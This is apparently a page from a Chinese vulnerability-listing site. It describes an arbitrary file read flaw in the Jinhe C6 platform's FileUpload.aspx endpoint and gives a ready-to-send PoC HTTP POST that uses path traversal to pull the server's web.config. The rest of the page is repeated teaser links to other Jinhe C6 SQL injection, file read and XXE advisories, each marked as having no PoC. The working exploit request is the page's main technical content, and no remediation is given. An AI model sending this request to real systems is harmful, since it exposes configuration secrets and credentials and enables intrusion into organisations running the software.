金和C6 FileUpload.aspx 存在任意文件读取漏洞

漏洞描述

金和C6 FileUpload.aspx 存在文件读取漏洞，利用此漏洞可获取服务器敏感信息。

PoC代码

POST /c6/JHSoft.WCF/FunctionNew/FileUpload.aspx/ HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

filename=../../../c6/web.config

相关漏洞推荐

金和C6 IncentivePlanFulfillAppprove sql注入漏洞无POC

2025-02-24 | 金和C6

金和oa协同管理平台（又称金和C6协调管理平台）,金和C6 在/IncentivePlanFulfillAppprove接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL注入漏洞获取数据库中...
金和C6协同管理平台 DBModules.aspx存在SQL注入漏洞无POC

2024-08-22 | 金和C6协同管理平台

金和OA C6是一款综合性的企业管理软件，包含了财务管理、人力资源管理、供应链管理、客户关系管理等多个模块，能够满足企业各个部门的管理需求。金和C6协同管理平台DBModules.aspx存在SQL注...
金和-c6 FileDownLoad存在任意文件读取漏洞无POC

2024-05-08 | 金和c6 FileDownLoad

金和C6是一款企业级协同管理平台软件系统，它基于Web，拥有自主知识产权。金和C6协同管理平台共有20多个应用模块，160多个应用子模块，涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客...
金和C6 CheckPwd.aspx XML外部实体注入漏洞无POC

2025-07-24 | 金C6

金和OA C6 CheckPwd.aspx接口处存在XML实体注入漏洞，攻击者可利用xxe漏洞获取服务器敏感数据，可读取任意文件以及ssrf攻击，存在一定的安全隐患。
SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software

SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

漏洞描述

PoC代码

相关漏洞推荐

金和C6 IncentivePlanFulfillAppprove sql注入漏洞 无POC

金和C6协同管理平台 DBModules.aspx存在SQL注入漏洞 无POC

金和-c6 FileDownLoad存在任意文件读取漏洞 无POC

金和C6 CheckPwd.aspx XML外部实体注入漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

金和C6 IncentivePlanFulfillAppprove sql注入漏洞无POC

金和C6协同管理平台 DBModules.aspx存在SQL注入漏洞无POC

金和-c6 FileDownLoad存在任意文件读取漏洞无POC

金和C6 CheckPwd.aspx XML外部实体注入漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC